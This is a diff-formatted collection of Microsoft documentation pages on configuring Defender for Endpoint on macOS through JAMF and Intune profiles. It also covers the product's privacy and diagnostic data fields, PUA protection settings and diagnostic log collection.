-- Enable automatic security intelligence updates-- Enable cloud-delivered protection-- Enable automatic sample submission-
-### Property list for JAMF recommended configuration profile
-
-```XML
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>antivirusEngine</key>
- <dict>
- <key>enforcementLevel</key>
- <string>real_time</string>
- <key>threatTypeSettings</key>
- <array>
- <dict>
- <key>key</key>
- <string>potentially_unwanted_application</string>
- <key>value</key>
- <string>block</string>
- </dict>
- <dict>
- <key>key</key>
- <string>archive_bomb</string>
- <key>value</key>
- <string>audit</string>
- </dict>
- </array>
- </dict>
- <key>cloudService</key>
- <dict>
- <key>enabled</key>
- <true/>
- <key>automaticSampleSubmission</key>
- <true/>
- <key>automaticDefinitionUpdateEnabled</key>
- <true/>
- </dict>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- </dict>
-</dict>
-</plist>
-```
-
-### Intune recommended profile
-
-```XML
-<?xml version="1.0" encoding="utf-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender for Endpoint settings</string>
- <key>PayloadDescription</key>
- <string>Microsoft Defender for Endpoint configuration settings</string>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
- <key>PayloadType</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender for Endpoint configuration settings</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>antivirusEngine</key>
- <dict>
- <key>enforcementLevel</key>
- <string>real_time</string>
- <key>threatTypeSettings</key>
- <array>
- <dict>
- <key>key</key>
- <string>potentially_unwanted_application</string>
- <key>value</key>
- <string>block</string>
- </dict>
- <dict>
- <key>key</key>
- <string>archive_bomb</string>
- <key>value</key>
- <string>audit</string>
- </dict>
- </array>
- </dict>
- <key>cloudService</key>
- <dict>
- <key>enabled</key>
- <true/>
- <key>automaticSampleSubmission</key>
- <true/>
- <key>automaticDefinitionUpdateEnabled</key>
- <true/>
- </dict>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- </dict>
- </dict>
- </array>
- </dict>
-</plist>
-```
-
-## Full configuration profile example
-
-The following templates contain entries for all settings described in this document and can be used for more advanced scenarios where you want more control over Microsoft Defender for Endpoint on macOS.
-
-### Property list for JAMF full configuration profile
-
-```XML
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>antivirusEngine</key>
- <dict>
- <key>enforcementLevel</key>
- <string>real_time</string>
- <key>scanAfterDefinitionUpdate</key>
- <true/>
- <key>scanArchives</key>
- <true/>
- <key>maximumOnDemandScanThreads</key>
- <integer>2</integer>
- <key>exclusions</key>
- <array>
- <dict>
- <key>$type</key>
- <string>excludedPath</string>
- <key>isDirectory</key>
- <false/>
- <key>path</key>
- <string>/var/log/system.log</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedPath</string>
- <key>isDirectory</key>
- <true/>
- <key>path</key>
- <string>/home</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedPath</string>
- <key>isDirectory</key>
- <true/>
- <key>path</key>
- <string>/Users/*/git</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedFileExtension</string>
- <key>extension</key>
- <string>pdf</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedFileName</string>
- <key>name</key>
- <string>cat</string>
- </dict>
- </array>
- <key>exclusionsMergePolicy</key>
- <string>merge</string>
- <key>allowedThreats</key>
- <array>
- <string>EICAR-Test-File (not a virus)</string>
- </array>
- <key>disallowedThreatActions</key>
- <array>
- <string>allow</string>
- <string>restore</string>
- </array>
- <key>threatTypeSettings</key>
- <array>
- <dict>
- <key>key</key>
- <string>potentially_unwanted_application</string>
- <key>value</key>
- <string>block</string>
- </dict>
- <dict>
- <key>key</key>
- <string>archive_bomb</string>
- <key>value</key>
- <string>audit</string>
- </dict>
- </array>
- <key>threatTypeSettingsMergePolicy</key>
- <string>merge</string>
- </dict>
- <key>cloudService</key>
- <dict>
- <key>enabled</key>
- <true/>
- <key>diagnosticLevel</key>
- <string>optional</string>
- <key>automaticSampleSubmission</key>
- <true/>
- <key>automaticDefinitionUpdateEnabled</key>
- <true/>
- <key>cloudBlockLevel</key>
- <string>normal</string>
- </dict>
- <key>edr</key>
- <dict>
- <key>tags</key>
- <array>
- <dict>
- <key>key</key>
- <string>GROUP</string>
- <key>value</key>
- <string>ExampleTag</string>
- </dict>
- </array>
- </dict>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- <key>exclusions</key>
- <array>
- <dict>
- <key>path</key>
- <string>/bin/zsh</string>
- <key>teamId</key>
- <string/>
- <key>signingId</key>
- <string>com.apple.zsh</string>
- <key>args</key>
- <array>
- <string>/usr/local/bin/test.sh</string>
- </array>
- </dict>
- <dict>
- <key>path</key>
- <string>/usr/local/jamf/bin/jamf</string>
- <key>teamId</key>
- <string>483DWKW443</string>
- <key>signingId</key>
- <string>com.jamfsoftware.jamf</string>
- </dict>
- </array>
- </dict>
- <key>userInterface</key>
- <dict>
- <key>hideStatusMenuIcon</key>
- <false/>
- <key>userInitiatedFeedback</key>
- <string>enabled</string>
- </dict>
-</dict>
-</plist>
-```
-
-### Intune full profile
-
-```XML
-<?xml version="1.0" encoding="utf-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender for Endpoint settings</string>
- <key>PayloadDescription</key>
- <string>Microsoft Defender for Endpoint configuration settings</string>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
- <key>PayloadType</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender for Endpoint configuration settings</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>antivirusEngine</key>
- <dict>
- <key>enforcementLevel</key>
- <string>real_time</string>
- <key>scanAfterDefinitionUpdate</key>
- <true/>
- <key>scanArchives</key>
- <true/>
- <key>maximumOnDemandScanThreads</key>
- <integer>1</integer>
- <key>exclusions</key>
- <array>
- <dict>
- <key>$type</key>
- <string>excludedPath</string>
- <key>isDirectory</key>
- <false/>
- <key>path</key>
- <string>/var/log/system.log</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedPath</string>
- <key>isDirectory</key>
- <true/>
- <key>path</key>
- <string>/home</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedPath</string>
- <key>isDirectory</key>
- <true/>
- <key>path</key>
- <string>/Users/*/git</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedFileExtension</string>
- <key>extension</key>
- <string>pdf</string>
- </dict>
- <dict>
- <key>$type</key>
- <string>excludedFileName</string>
- <key>name</key>
- <string>cat</string>
- </dict>
- </array>
- <key>exclusionsMergePolicy</key>
- <string>merge</string>
- <key>allowedThreats</key>
- <array>
- <string>EICAR-Test-File (not a virus)</string>
- </array>
- <key>disallowedThreatActions</key>
- <array>
- <string>allow</string>
- <string>restore</string>
- </array>
- <key>threatTypeSettings</key>
- <array>
- <dict>
- <key>key</key>
- <string>potentially_unwanted_application</string>
- <key>value</key>
- <string>block</string>
- </dict>
- <dict>
- <key>key</key>
- <string>archive_bomb</string>
- <key>value</key>
- <string>audit</string>
- </dict>
- </array>
- <key>threatTypeSettingsMergePolicy</key>
- <string>merge</string>
- </dict>
- <key>cloudService</key>
- <dict>
- <key>enabled</key>
- <true/>
- <key>diagnosticLevel</key>
- <string>optional</string>
- <key>automaticSampleSubmission</key>
- <true/>
- <key>automaticDefinitionUpdateEnabled</key>
- <true/>
- <key>cloudBlockLevel</key>
- <string>normal</string>
- </dict>
- <key>edr</key>
- <dict>
- <key>tags</key>
- <array>
- <dict>
- <key>key</key>
- <string>GROUP</string>
- <key>value</key>
- <string>ExampleTag</string>
- </dict>
- </array>
- </dict>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- <key>exclusions</key>
- <array>
- <dict>
- <key>path</key>
- <string>/bin/zsh</string>
- <key>teamId</key>
- <string/>
- <key>signingId</key>
- <string>com.apple.zsh</string>
- <key>args</key>
- <array>
- <string>/usr/local/bin/test.sh</string>
- </array>
- </dict>
- <dict>
- <key>path</key>
- <string>/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon</string>
- <key>teamId</key>
- <string>UBF8T346G9</string>
- <key>signingId</key>
- <string>IntuneMdmDaemon</string>
- </dict>
- </array>
- </dict>
- <key>userInterface</key>
- <dict>
- <key>hideStatusMenuIcon</key>
- <false/>
- <key>userInitiatedFeedback</key>
- <string>enabled</string>
- </dict>
- </dict>
- </array>
- </dict>
-</plist>
-```
-
-## Property list validation
-
-The property list must be a valid *.plist* file. This can be checked by executing:
-
-```bash
-plutil -lint com.microsoft.wdav.plist
-```
-
-```console
-com.microsoft.wdav.plist: OK
-```
-
-If the file is well-formed, the above command outputs `OK` and returns an exit code of `0`. Otherwise, an error that describes the issue is displayed and the command returns an exit code of `1`.
-
-## Configuration profile deployment
-
-Once you've built the configuration profile for your enterprise, you can deploy it through the management console that your enterprise is using. The following sections provide instructions on how to deploy this profile using JAMF and Intune.
-
-### JAMF deployment
-
-From the JAMF console, open **Computers** \> **Configuration Profiles**, navigate to the configuration profile you'd like to use, then select **Custom Settings**. Create an entry with `com.microsoft.wdav` as the preference domain and upload the *.plist* produced earlier.
-
-> [!CAUTION]
-> You must enter the correct preference domain (`com.microsoft.wdav`); otherwise, the preferences will not be recognized by Microsoft Defender for Endpoint.
-
-### Intune deployment
-
-1. Open **Devices** \> **Configuration Profiles**. Select **Create Profile**.
-
-2. Choose a name for the profile. Change **Platform=macOS** to **Profile type=Templates** and choose **Custom** in the template name section. Select **Configure**.
-
-3. Save the .plist produced earlier as `com.microsoft.wdav.xml`.
-
-4. Enter `com.microsoft.wdav` as the **custom configuration profile name**.
-
-5. Open the configuration profile and upload the `com.microsoft.wdav.xml` file. (This file was created in step 3.)
-
-6. Select **OK**.
-
-7. Select **Manage** \> **Assignments**. In the **Include** tab, select **Assign to All Users & All devices**.
-
-> [!CAUTION]
-> You must enter the correct custom configuration profile name; otherwise, these preferences will not be recognized by Microsoft Defender for Endpoint.
-
-## Resources
--- [Configuration Profile Reference (Apple developer documentation)](https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf)
security Mac Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-privacy.md
- Title: Privacy for Microsoft Defender for Endpoint on Mac
-description: Privacy controls, how to configure policy settings that impact privacy and information about the diagnostic data collected in Microsoft Defender for Endpoint on Mac.
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Privacy for Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft is committed to providing you with the information and controls you need to make choices about how your data is collected and used when you're using Microsoft Defender for Endpoint on macOS.
-
-This topic describes the privacy controls available within the product, how to manage these controls with policy settings and more details on the data events that are collected.
-
-## Overview of privacy controls in Microsoft Defender for Endpoint on macOS
-
-This section describes the privacy controls for the different types of data collected by Microsoft Defender for Endpoint on macOS.
-
-### Diagnostic data
-
-Diagnostic data is used to keep Microsoft Defender for Endpoint secure and up to date, detect, diagnose and fix problems, and also make product improvements.
-
-Some diagnostic data is required, while some diagnostic data is optional. We give you the ability to choose whether to send us required or optional diagnostic data through the use of privacy controls, such as policy settings for organizations.
-
-There are two levels of diagnostic data for Microsoft Defender for Endpoint client software that you can choose from:
--- **Required**: The minimum data necessary to help keep Microsoft Defender for Endpoint secure, up to date, and performing as expected on the device it's installed on.--- **Optional**: Additional data that helps Microsoft make product improvements and provides enhanced information to help detect, diagnose, and remediate issues.-
-By default, only required diagnostic data is sent to Microsoft.
-
-### Cloud delivered protection data
-
-Cloud delivered protection is used to provide increased and faster protection with access to the latest protection data in the cloud.
-
-Enabling the cloud-delivered protection service is optional, however it's highly recommended because it provides important protection against malware on your endpoints and across your network.
-
-### Sample data
-
-Sample data is used to improve the protection capabilities of the product, by sending Microsoft suspicious samples so they can be analyzed. Enabling automatic sample submission is optional.
-
-When this feature is enabled and the sample that is collected is likely to contain personal information, the user is prompted for consent.
-
-## Manage privacy controls with policy settings
-
-If you're an IT administrator, you might want to configure these controls at the enterprise level.
-
-The privacy controls for the various types of data described in the preceding section are described in detail in [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md).
-
-As with any new policy settings, you should carefully test them out in a limited, controlled environment to ensure the settings that you configure have the desired effect before you implement the policy settings more widely in your organization.
-
-## Diagnostic data events
-
-This section describes what is considered required diagnostic data and what is considered optional diagnostic data, along with a description of the events and fields that are collected.
-
-### Data fields that are common for all events
-
-There's some information about events that is common to all events, regardless of category or data subtype.
-
-The following fields are considered common for all events:
-
-|Field|Description|
-|||
-|platform|The broad classification of the platform on which the app is running. Allows Microsoft to identify on which platforms an issue may be occurring so that it can correctly be prioritized.|
-|machine_guid|Unique identifier associated with the device. Allows Microsoft to identify whether issues are impacting a select set of installs and how many users are impacted.|
-|sense_guid|Unique identifier associated with the device. Allows Microsoft to identify whether issues are impacting a select set of installs and how many users are impacted.|
-|org_id|Unique identifier associated with the enterprise that the device belongs to. Allows Microsoft to identify whether issues are impacting a select set of enterprises and how many enterprises are impacted.|
-|hostname|Local device name (without DNS suffix). Allows Microsoft to identify whether issues are impacting a select set of installs and how many users are impacted.|
-|product_guid|Unique identifier of the product. Allows Microsoft to differentiate issues impacting different flavors of the product.|
-|app_version|Version of the Microsoft Defender for Endpoint on macOS application. Allows Microsoft to identify which versions of the product are showing an issue so that it can correctly be prioritized.|
-|sig_version|Version of security intelligence database. Allows Microsoft to identify which versions of the security intelligence are showing an issue so that it can correctly be prioritized.|
-|supported_compressions|List of compression algorithms supported by the application, for example `['gzip']`. Allows Microsoft to understand what types of compressions can be used when it communicates with the application.|
-|release_ring|Ring that the device is associated with (for example Insider Fast, Insider Slow, Production). Allows Microsoft to identify on which release ring an issue may be occurring so that it can correctly be prioritized.|
-
-### Required diagnostic data
-
-**Required diagnostic data** is the minimum data necessary to help keep Microsoft Defender for Endpoint secure, up to date, and perform as expected on the device it's installed on.
-
-Required diagnostic data helps to identify problems with Microsoft Defender for Endpoint that may be related to a device or software configuration. For example, it can help determine if a Microsoft Defender for Endpoint feature crashes more frequently on a particular operating system version, with newly introduced features, or when certain Microsoft Defender for Endpoint features are disabled. Required diagnostic data helps Microsoft detect, diagnose, and fix these problems more quickly so the impact to users or organizations is reduced.
-
-#### Software setup and inventory data events
-
-**Microsoft Defender for Endpoint installation / uninstallation**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|correlation_id|Unique identifier associated with the installation.|
-|version|Version of the package.|
-|severity|Severity of the message (for example Informational).|
-|code|Code that describes the operation.|
-|text|Additional information associated with the product installation.|
-
-**Microsoft Defender for Endpoint configuration**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|antivirus_engine.enable_real_time_protection|Whether real-time protection is enabled on the device or not.|
-|antivirus_engine.passive_mode|Whether passive mode is enabled on the device or not.|
-|cloud_service.enabled|Whether cloud delivered protection is enabled on the device or not.|
-|cloud_service.timeout|Time out when the application communicates with the Microsoft Defender for Endpoint cloud.|
-|cloud_service.heartbeat_interval|Interval between consecutive heartbeats sent by the product to the cloud.|
-|cloud_service.service_uri|URI used to communicate with the cloud.|
-|cloud_service.diagnostic_level|Diagnostic level of the device (required, optional).|
-|cloud_service.automatic_sample_submission|Whether automatic sample submission is turned on or not.|
-|cloud_service.automatic_definition_update_enabled|Whether automatic definition update is turned on or not.|
-|edr.early_preview|Whether the device should run EDR early preview features.|
-|edr.group_id|Group identifier used by the detection and response component.|
-|edr.tags|User-defined tags.|
-|features.\[optional feature name\]|List of preview features, along with whether they're enabled or not.|
-
-#### Product and service usage data events
-
-**Security intelligence update report**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|from_version|Original security intelligence version.|
-|to_version|New security intelligence version.|
-|status|Status of the update indicating success or failure.|
-|using_proxy|Whether the update was done over a proxy.|
-|error|Error code if the update failed.|
-|reason|Error message if the updated filed.|
-
-#### Product and service performance data events for required diagnostic data
-
-**Unexpected application exit (crash)**:
-
-Collects system information and the state of an application when an application unexpectedly exits.
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|v1_crash_count|Number of times V1 engine process crashed every hour on client machine|
-|v2_crash_count|Number of times V2 engine process crashed every hour on client machine|
-|EDR_crash_count|Number of times EDR process crashed every hour on client machine|
-
-**Kernel extension statistics**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|version|Version of Microsoft Defender for Endpoint on macOS.|
-|instance_id|Unique identifier generated on kernel extension startup.|
-|trace_level|Trace level of the kernel extension.|
-|subsystem|The underlying subsystem used for real-time protection.|
-|ipc.connects|Number of connection requests received by the kernel extension.|
-|ipc.rejects|Number of connection requests rejected by the kernel extension.|
-|ipc.connected|Whether there's any active connection to the kernel extension.|
-
-#### Support data
-
-**Diagnostic logs**:
-
-Diagnostic logs are collected only with the consent of the user as part of the feedback submission feature. The following files are collected as part of the support logs:
--- All files under */Library/Logs/Microsoft/mdatp/*-- Subset of files under */Library/Application Support/Microsoft/Defender/* that are created and used by Microsoft Defender for Endpoint on macOS-- Subset of files under */Library/Managed Preferences* that are used by Microsoft Defender for Endpoint on macOS-- /Library/Logs/Microsoft/autoupdate.log-- $HOME/Library/Preferences/com.microsoft.autoupdate2.plist-
-### Optional diagnostic data
-
-**Optional diagnostic data** is additional data that helps Microsoft make product improvements and provides enhanced information to help detect, diagnose, and fix issues.
-
-If you choose to send us optional diagnostic data, required diagnostic data is also included.
-
-Examples of optional diagnostic data include data Microsoft collects about product configuration (for example number of exclusions set on the device) and product performance (aggregate measures about the performance of components of the product).
-
-#### Software setup and inventory data events for optional diagnostic data
-
-**Microsoft Defender for Endpoint configuration**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|connection_retry_timeout|Connection retry time out when communication with the cloud.|
-|file_hash_cache_maximum|Size of the product cache.|
-|crash_upload_daily_limit|Limit of crash logs uploaded daily.|
-|antivirus_engine.exclusions[].is_directory|Whether the exclusion from scanning is a directory or not.|
-|antivirus_engine.exclusions[].path|Path that was excluded from scanning.|
-|antivirus_engine.exclusions[].extension|Extension excluded from scanning.|
-|antivirus_engine.exclusions[].name|Name of the file excluded from scanning.|
-|antivirus_engine.scan_cache_maximum|Size of the product cache.|
-|antivirus_engine.maximum_scan_threads|Maximum number of threads used for scanning.|
-|antivirus_engine.threat_restoration_exclusion_time|Time out before a file restored from the quarantine can be detected again.|
-|antivirus_engine.threat_type_settings|Configuration for how different threat types are handled by the product.|
-|filesystem_scanner.full_scan_directory|Full scan directory.|
-|filesystem_scanner.quick_scan_directories|List of directories used in quick scan.|
-|edr.latency_mode|Latency mode used by the detection and response component.|
-|edr.proxy_address|Proxy address used by the detection and response component.|
-
-**Microsoft Auto-Update configuration**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|how_to_check|Determines how product updates are checked (for example automatic or manual).|
-|channel_name|Update channel associated with the device.|
-|manifest_server|Server used for downloading updates.|
-|update_cache|Location of the cache used to store updates.|
-
-### Product and service usage
-
-#### Diagnostic log upload started report
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|sha256|SHA256 identifier of the support log.|
-|size|Size of the support log.|
-|original_path|Path to the support log (always under */Library/Application Support/Microsoft/Defender/wdavdiag/*).|
-|format|Format of the support log.|
-|metadata|Information about the content of the support log.|
-
-#### Diagnostic log upload completed report
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|request_id|Correlation ID for the support log upload request.|
-|sha256|SHA256 identifier of the support log.|
-|blob_sas_uri|URI used by the application to upload the support log.|
-
-#### Product and service performance data events for product and service usage
-
-**Unexpected application exit (crash)**:
-
-Unexpected application exits and the state of the application when that happens.
-
-**Kernel extension statistics**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|pkt_ack_timeout|The following properties are aggregated numerical values, representing count of events that happened since kernel extension startup.|
-|pkt_ack_conn_timeout||
-|ipc.ack_pkts||
-|ipc.nack_pkts||
-|ipc.send.ack_no_conn||
-|ipc.send.nack_no_conn||
-|ipc.send.ack_no_qsq||
-|ipc.send.nack_no_qsq||
-|ipc.ack.no_space||
-|ipc.ack.timeout||
-|ipc.ack.ackd_fast||
-|ipc.ack.ackd||
-|ipc.recv.bad_pkt_len||
-|ipc.recv.bad_reply_len||
-|ipc.recv.no_waiter||
-|ipc.recv.copy_failed||
-|ipc.kauth.vnode.mask||
-|ipc.kauth.vnode.read||
-|ipc.kauth.vnode.write||
-|ipc.kauth.vnode.exec||
-|ipc.kauth.vnode.del||
-|ipc.kauth.vnode.read_attr||
-|ipc.kauth.vnode.write_attr||
-|ipc.kauth.vnode.read_ex_attr||
-|ipc.kauth.vnode.write_ex_attr||
-|ipc.kauth.vnode.read_sec||
-|ipc.kauth.vnode.write_sec||
-|ipc.kauth.vnode.take_own||
-|ipc.kauth.vnode.link||
-|ipc.kauth.vnode.create||
-|ipc.kauth.vnode.move||
-|ipc.kauth.vnode.mount||
-|ipc.kauth.vnode.denied||
-|ipc.kauth.vnode.ackd_before_deadline||
-|ipc.kauth.vnode.missed_deadline||
-|ipc.kauth.file_op.mask||
-|ipc.kauth_file_op.open||
-|ipc.kauth.file_op.close||
-|ipc.kauth.file_op.close_modified||
-|ipc.kauth.file_op.move||
-|ipc.kauth.file_op.link||
-|ipc.kauth.file_op.exec||
-|ipc.kauth.file_op.remove||
-|ipc.kauth.file_op.unmount||
-|ipc.kauth.file_op.fork||
-|ipc.kauth.file_op.create||
-
-## Resources
--- [Privacy at Microsoft](https://privacy.microsoft.com/)
security Mac Pua https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-pua.md
- Title: Detect and block potentially unwanted applications with Microsoft Defender for Endpoint on Mac
-description: Detect and block Potentially Unwanted Applications (PUA) using Microsoft Defender for Endpoint on macOS.
------- m365-security-- tier3-- mde-macos-- Previously updated : 11/20/2023--
-# Detect and block potentially unwanted applications with Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-The potentially unwanted application (PUA) protection feature in Microsoft Defender for Endpoint on macOS can detect and block PUA files on endpoints in your network.
-
-These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. PUA can also refer to applications that are considered to have poor reputation.
-
-These applications can increase the risk of your network being infected with malware, cause malware infections to be harder to identify, and can waste IT resources in cleaning up the applications.
-
-## How it works
-
-Microsoft Defender for Endpoint on macOS can detect and report PUA files. When configured in blocking mode, PUA files are moved to the quarantine.
-
-When a PUA is detected on an endpoint, Microsoft Defender for Endpoint on macOS presents a notification to the user, unless notifications have been disabled. The threat name will contain the word "Application".
-
-## Configure PUA protection
-
-PUA protection in Microsoft Defender for Endpoint on macOS can be configured in one of the following ways:
--- **Off**: PUA protection is disabled.-- **Audit**: PUA files are reported in the product logs, but not in Microsoft Defender portal. No notification is presented to the user and no action is taken by the product.-- **Block**: PUA files are reported in the product logs and in Microsoft Defender portal. The user is presented with a notification and action is taken by the product.-
-> [!WARNING]
-> By default, PUA protection is configured in **Audit** mode.
-
-You can configure how PUA files are handled from the command line or from the management console.
-
-### Use the command-line tool to configure PUA protection:
-
-In Terminal, execute the following command to configure PUA protection:
-
-```bash
-mdatp threat policy set --type potentially_unwanted_application --action [off|audit|block]
-```
-
-### Use the management console to configure PUA protection:
-
-In your enterprise, you can configure PUA protection from a management console, such as JAMF or Intune, similarly to how other product settings are configured. For more information, see the [Threat type settings](mac-preferences.md#threat-type-settings) section of the [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md) topic.
-
-### Test PUA protection:
-
-You are able to test PUA protection by going to [Potentially unwanted applications (PUA) demonstration](/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-potentially-unwanted-applications).
-
-## Related topics
--- [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)-
security Mac Resources https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-resources.md
- Title: Resources for Microsoft Defender for Endpoint on Mac
-description: Resources for Microsoft Defender for Endpoint on Mac, including how to uninstall it, how to collect diagnostic logs, CLI commands, and known issues with the product.
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/11/2023--
-# Resources for Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## Collecting diagnostic information
-
-If you can reproduce a problem, increase the logging level, run the system for some time, and restore the logging level to the default.
-
-1. Increase logging level:
-
- ```bash
- mdatp log level set --level debug
- ```
-
- ```Output
- Log level configured successfully
- ```
-
-2. Reproduce the problem
-
-3. Run `sudo mdatp diagnostic create` to back up the Microsoft Defender for Endpoint logs. The files will be stored inside a .zip archive. This command will also print out the file path to the backup after the operation succeeds.
-
- > [!TIP]
- > By default, diagnostic logs are saved to `/Library/Application Support/Microsoft/Defender/wdavdiag/`. To change the directory where diagnostic logs are saved, pass `--path [directory]` to the below command, replacing `[directory]` with the desired directory.
-
- ```bash
- sudo mdatp diagnostic create
- ```
-
- ```console
- Diagnostic file created: "/Library/Application Support/Microsoft/Defender/wdavdiag/932e68a8-8f2e-4ad0-a7f2-65eb97c0de01.zip"
- ```
-
-4. Restore logging level:
-
- ```bash
- mdatp log level set --level info
- ```
-
- ```console
- Log level configured successfully
- ```
-
-## Logging installation issues
-
-If an error occurs during installation, the installer will only report a general failure.
-
-The detailed log will be saved to `/Library/Logs/Microsoft/mdatp/install.log`. If you experience issues during installation, send us this file so we can help diagnose the cause.
-For further troubleshooting installation issues, please review [Troubleshoot installation issues for Microsoft Defender for Endpoint on macOS](mac-support-install.md)
-
-## Uninstalling
-
